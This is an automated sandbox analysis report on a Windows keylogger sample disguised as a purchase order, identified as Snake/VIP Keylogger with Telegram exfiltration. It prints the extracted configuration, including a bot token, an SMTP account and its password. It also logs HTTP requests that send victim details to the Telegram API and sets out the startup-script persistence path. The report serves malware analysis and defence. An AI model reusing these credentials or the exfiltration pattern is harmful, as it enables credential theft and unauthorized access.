Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order PO#86637.exe

Overview

General Information

Sample name:New Order PO#86637.exe
Analysis ID:1513787
MD5:6fa58744ffb09c72c150f276f7c79ecd
SHA1:f7202152b97a7c9396b43c53d30de9353cbf8836
SHA256:5c6ff5340700194b1ec369d0fa8c4d03320a3e7379903d19a7c1fce628ee73bc
Tags:exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • New Order PO#86637.exe (PID: 5636 cmdline: "C:\Users\user\Desktop\New Order PO#86637.exe" MD5: 6FA58744FFB09C72C150F276F7C79ECD)
    • name.exe (PID: 4592 cmdline: "C:\Users\user\Desktop\New Order PO#86637.exe" MD5: 6FA58744FFB09C72C150F276F7C79ECD)
      • RegSvcs.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\New Order PO#86637.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 3964 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6FA58744FFB09C72C150F276F7C79ECD)
      • RegSvcs.exe (PID: 5688 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendMessage"}
{"Exfil Mode": "SMTP", "Bot Token": "7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU", "Chat id": "403948698", "Email ID": "jyotis@sixilncoln.com", "Password": "yUiavQX8", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
{"Exfil Mode": "Telegram", "Username": "jyotis@sixilncoln.com", "Password": "yUiavQX8", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Token": "7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU", "Chat_id": "403948698", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 34 entries
            SourceRuleDescriptionAuthorStrings
            5.2.name.exe.3f40000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.name.exe.3f40000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                5.2.name.exe.3f40000.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  5.2.name.exe.3f40000.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    2.2.name.exe.3740000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 21 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 3964, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 1488, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49745
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 3964, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 4592, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-19T12:21:09.868381+020028033053Unknown Traffic192.168.2.549706188.114.97.3443TCP
                      2024-09-19T12:21:12.587080+020028033053Unknown Traffic192.168.2.549710188.114.97.3443TCP
                      2024-09-19T12:21:16.853340+020028033053Unknown Traffic192.168.2.549716188.114.97.3443TCP
                      2024-09-19T12:21:19.697445+020028033053Unknown Traffic192.168.2.549721188.114.97.3443TCP
                      2024-09-19T12:21:21.955719+020028033053Unknown Traffic192.168.2.549726188.114.97.3443TCP
                      2024-09-19T12:21:23.660634+020028033053Unknown Traffic192.168.2.549729188.114.97.3443TCP
                      2024-09-19T12:21:26.310849+020028033053Unknown Traffic192.168.2.549735188.114.97.3443TCP
                      2024-09-19T12:21:28.933359+020028033053Unknown Traffic192.168.2.549739188.114.97.3443TCP
                      2024-09-19T12:21:30.247026+020028033053Unknown Traffic192.168.2.549741188.114.97.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-19T12:21:07.338014+020028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
                      2024-09-19T12:21:09.322399+020028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
                      2024-09-19T12:21:10.634957+020028032742Potentially Bad Traffic192.168.2.549707132.226.247.7380TCP
                      2024-09-19T12:21:12.041239+020028032742Potentially Bad Traffic192.168.2.549709132.226.247.7380TCP
                      2024-09-19T12:21:19.338020+020028032742Potentially Bad Traffic192.168.2.549719132.226.247.7380TCP
                      2024-09-19T12:21:20.478700+020028032742Potentially Bad Traffic192.168.2.549719132.226.247.7380TCP
                      2024-09-19T12:21:23.019969+020028032742Potentially Bad Traffic192.168.2.549728132.226.247.7380TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: New Order PO#86637.exeAvira: detected
                      Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                      Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                      Source: C:\Users\user\AppData\Local\directory\name.exeAvira: detection malicious, Label: HEUR/AGEN.1321293
                      Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "jyotis@sixilncoln.com", "Password": "yUiavQX8", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Token": "7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU", "Chat_id": "403948698", "Version": "4.4"}
                      Source: 2.2.name.exe.3740000.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU", "Chat id": "403948698", "Email ID": "jyotis@sixilncoln.com", "Password": "yUiavQX8", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
                      Source: RegSvcs.exe.1488.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendMessage"}
                      Source: C:\Users\user\AppData\Local\directory\name.exeReversingLabs: Detection: 47%
                      Source: New Order PO#86637.exeReversingLabs: Detection: 42%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
                      Source: New Order PO#86637.exeJoe Sandbox ML: detected

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: New Order PO#86637.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49724 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61520 version: TLS 1.2
                      Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2096037101.0000000004590000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2097615402.0000000004730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2224019871.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2223130038.00000000049D0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2096037101.0000000004590000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2097615402.0000000004730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2224019871.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2223130038.00000000049D0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0298F45Dh3_2_0298F2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0298F45Dh3_2_0298F4AC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0298FC19h3_2_0298F961
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 065431E0h3_2_06542DC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06540D0Dh3_2_06540B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06541697h3_2_06540B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06542C19h3_2_06542968
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654E0A9h3_2_0654DE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654E959h3_2_0654E6B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654F209h3_2_0654EF60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654CF49h3_2_0654CCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654D7F9h3_2_0654D550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 065431E0h3_2_06542DC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654E501h3_2_0654E258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654EDB1h3_2_0654EB08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654F661h3_2_0654F3B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06540040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654FAB9h3_2_0654F810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654D3A1h3_2_0654D0F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 065431E0h3_2_0654310E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0654DC51h3_2_0654D9A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0250F45Dh6_2_0250F2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0250F45Dh6_2_0250F4AC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0250F45Dh6_2_0250F52F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0250FC19h6_2_0250F974
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CF31E0h6_2_04CF2DC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CF2C19h6_2_04CF2968
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CF0D0Dh6_2_04CF0B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CF1697h6_2_04CF0B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFCF49h6_2_04CFCCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CF31E0h6_2_04CF2DC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFD7F9h6_2_04CFD550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFE959h6_2_04CFE6B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_04CF0673
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFE0A9h6_2_04CFDE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFF209h6_2_04CFEF60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFD3A1h6_2_04CFD0F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_04CF0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_04CF0853
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFFAB9h6_2_04CFF810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFDC51h6_2_04CFD9A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CF31E0h6_2_04CF310E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFE501h6_2_04CFE258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFF661h6_2_04CFF3B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04CFEDB1h6_2_04CFEB08

                      Networking

                      barindex
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: global trafficTCP traffic: 192.168.2.5:49745 -> 208.91.199.223:587
                      Source: global trafficTCP traffic: 192.168.2.5:61592 -> 208.91.198.143:587
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2018:25:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2021:04:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
